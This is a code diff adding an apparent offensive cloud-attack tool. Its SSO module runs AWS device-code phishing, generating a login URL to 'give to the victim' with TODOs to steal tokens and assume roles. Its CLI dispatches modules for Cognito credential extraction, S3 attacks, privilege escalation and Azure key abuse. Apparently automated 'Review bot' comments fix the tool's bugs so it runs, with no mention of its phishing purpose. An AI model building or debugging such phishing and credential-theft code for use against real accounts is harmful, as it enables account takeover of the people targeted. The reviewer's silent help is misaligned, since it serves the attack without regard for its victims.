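--- a/clouds/aws/sso.py
+++ b/clouds/aws/sso.py
@@ -0,0 +1,27 @@
+# link expires in 6mins/ verify it and update script
+# update script to extract tokens after link is clicked
+# also update script to assume roles from the list
+# after assuming roles, enumerate permissions
+import boto3
+
+class AWSSSO:
+ pass
+ def attack(self):
+ region = "us-east-2"
+ url = "https://something.awsapps.com"
+ sso_oidc = boto3.client('sso-oidc', region_name= region)
+ client = sso_oidc.register_client(
+ client_name = 'thundercloud',
+ client_type = 'public'
+ )
+ client_id = client.get('clientId')
+ client_secret = client.get('clientSecret')
+ authz = sso_oidc.start_device_authorization(
+ clientId = client_id,
+ client_secret = client_secret,
+ startUrl = url
+ )
+ url = authz.get('verificationUriComplete')
+ deviceCode = authz.get('deviceCode')
+ print(client_id, client_secret, deviceCode)
+ print("Give this URL to the victim" + url)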
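Review bot: `print(client_id, client_secret, deviceCode)` on line 26 writes the registered OIDC client's secret to stdout, where it ends up in terminal scrollback and in any log capture of the process; keep the secret out of plain output and print only the non-secret identifiers, e.g. `print(client_id, deviceCode)`. The `pass` on line 8, directly above `def attack`, is dead and should be removed. The four leading `#` lines are a TODO list rather than documentation; `attack` has no docstring and returns nothing, so a one-line docstring stating that it only prints would tell the caller in main.py not to expect a result. Indentation is not visible in this rendered view, so the nesting of the body under `attack` is inferred.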
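--- a/main.py
+++ b/main.py
@@ -0,0 +1,49 @@
+import argparse
+
+def main():
+ """Main function"""
+ parser = argparse.ArgumentParser(description='Attack modules of cloud AWS')
+ parser.add_argument('-ce', '--cognito_endpoint', help='to verify if cognito endpoint is vulnerable '
+ 'and to extract credentials')
+ parser.add_argument('-sso', '--sso_url', help='AWS SSO URL to phish for AWS credentials')
+ parser.add_argument('-enum-roles', '--enumerate_roles', help='To enumerate account roles in victim AWS roles')
+ parser.add_argument('-s3', '--s3_bucket_name', help='Execute 7 attacks on S3 bucket')
+ parser.add_argument('-asum_role', '--assume_role', help='Privilege escalation for assuming roles')
+ parser.add_argument('-conn_string', '--connection_string', help='Azure Shared Access key for reading'
+ 'servicebus/queues/blobs etc')
+ parser.add_argument('-blob', '--blob', help='Azure blob enumeration')
+ parser.add_argument()
+ args = parser.parse_args()
+ if args.cognito_endpoint:
+ from clouds.aws.cognito import Cognito
+ attack_cognito = Cognito()
+ attack_cognito.attack()
+ elif args.sso_url:
+ from clouds.aws.sso import AWSSSO
+ attack_sso = AWSSSO()
+ attack_sso.attack()
+ elif args.enumerate_roles:
+ from clouds.aws.enum import EnumRoles
+ attack_roles = EnumRoles()
+ attack_roles.attack()
+ elif args.s3_bucket_name:
+ from clouds.aws.s3 import S3
+ attack_s3 = S3()
+ attack_s3.attack()
+ elif args.assume_role:
+ from clouds.aws.assume import AsumRole
+ attack_roles = AsumRole()
+ attack_roles.attack()
+ elif args.shared_access_key:
+ from clouds.azure.keys import ConnectionString
+ attack_keys = ConnectionString()
+ attack_keys.attack()
+ elif args.blob:
+ from clouds.azure.blob import Blob
+ attack_blob = Blob()
+ attack_blob.attack()
+
+
+
+if __name__ == '__main__':
+ main()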
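Review bot: `parser.add_argument()` on line 15 is called with no option strings or dest, which argparse rejects when the call runs, so `main()` raises at startup before `parse_args()` is ever reached; either remove the empty call or give it the option it was meant to register. The `elif args.shared_access_key:` branch on line 37 reads an attribute the parser never defines, because the matching option is registered as `--connection_string` (dest `connection_string`), so that branch raises AttributeError whenever control reaches it; change it to `elif args.connection_string:`. The help text on lines 12-13 concatenates `'...for reading'` and `'servicebus/...'` without a separating space, so the rendered help reads "readingservicebus". The `"""Main function"""` docstring could usefully say that every branch imports its module lazily and that exactly one option is acted on, in declaration order.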